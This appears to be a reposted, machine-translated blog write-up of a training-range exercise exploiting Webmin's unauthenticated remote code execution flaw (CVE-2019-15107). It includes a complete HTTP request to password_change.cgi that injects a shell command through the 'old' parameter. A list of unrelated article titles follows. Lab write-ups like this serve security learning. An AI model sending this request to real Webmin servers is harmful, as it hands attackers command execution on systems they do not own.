当前位置:网站首页>Moher College webmin unauthenticated remote code execution
Moher College webmin unauthenticated remote code execution
2022-07-04 07:44:00 【Lyswbb】
First, get to the shooting range and visit , Visit a landing page later

According to the title , Unauthorized rce, So you can look for history first CVE Number (CVE-2019-15107), After finding it, directly reproduce the vulnerability , The vulnerability lies in the password reset function :Webmin--Webmin confuration--Authentication

burp Grab traffic packets , Then change the parameters , Pay attention to the need to session_login.cgi Change to password_change.cgi, The following parameters can be copied directly , The trigger of this vulnerability point only needs to pass one expired Execute the command with parameters
POST /password_change.cgi HTTP/1.1
Host: 124.70.64.48:47372
Cookie: redirect=1; testing=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Origin: https://124.70.64.48:47372
Referer: https://124.70.64.48:47372/session_login.cgi
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
user=dfgfgf&pam=&expired=2&old=test|pwd&new1=test2&new2=test2
Directly query the root key.txt that will do

边栏推荐
- Literature collation and thesis reading methods
- zabbix 5.0监控客户端
- OKR vs. KPI 一次搞清楚这两大概念!
- 线性代数1.1
- Figure guessing game
- 深入浅出:了解时序数据库 InfluxDB
- Zephyr 学习笔记1,threads
- 真空介电常数和真空磁导率究竟是由什么决定的?为何会存在这两个物理量?
- Advanced MySQL: Basics (5-8 Lectures)
- Improve the accuracy of 3D reconstruction of complex scenes | segmentation of UAV Remote Sensing Images Based on paddleseg
猜你喜欢

Introduction to neural network (Part 2)

Distributed transaction management DTM: the little helper behind "buy buy buy"

BUUCTF(4)

Go h*ck yourself:online reconnaissance (online reconnaissance)

Linear algebra 1.1

ZABBIX monitoring system custom monitoring content

The cloud native programming challenge ended, and Alibaba cloud launched the first white paper on application liveliness technology in the field of cloud native

Handwritten easy version flexible JS and source code analysis

In the era of low code development, is it still needed?

Rhcsa day 3
随机推荐
NPM run build error
ZABBIX monitoring system deployment
PCIE知识点-010:PCIE 热插拔资料从哪获取
Zephyr 学习笔记2,Scheduling
The frost peel off the purple dragon scale, and the xiariba people will talk about database SQL optimization and the principle of indexing (primary / secondary / clustered / non clustered)
人生规划(Flag)
It's healthy to drink medicinal wine like this. Are you drinking it right
Unity opens the explorer from the inspector interface, selects and records the file path
Scanf read in data type symbol table
神经网络入门(下)
Jianmu continuous integration platform v2.2.2 release
Oracle-存储过程与函数
Rapidjson reading and writing JSON files
线性代数1.1
Blue Bridge Cup Quick sort (code completion)
Chrome is set to pure black
[gurobi] establishment of simple model
The text box displays the word (prompt text) by default, and the text disappears after clicking.
ZABBIX monitoring system custom monitoring content
Zephyr 學習筆記2,Scheduling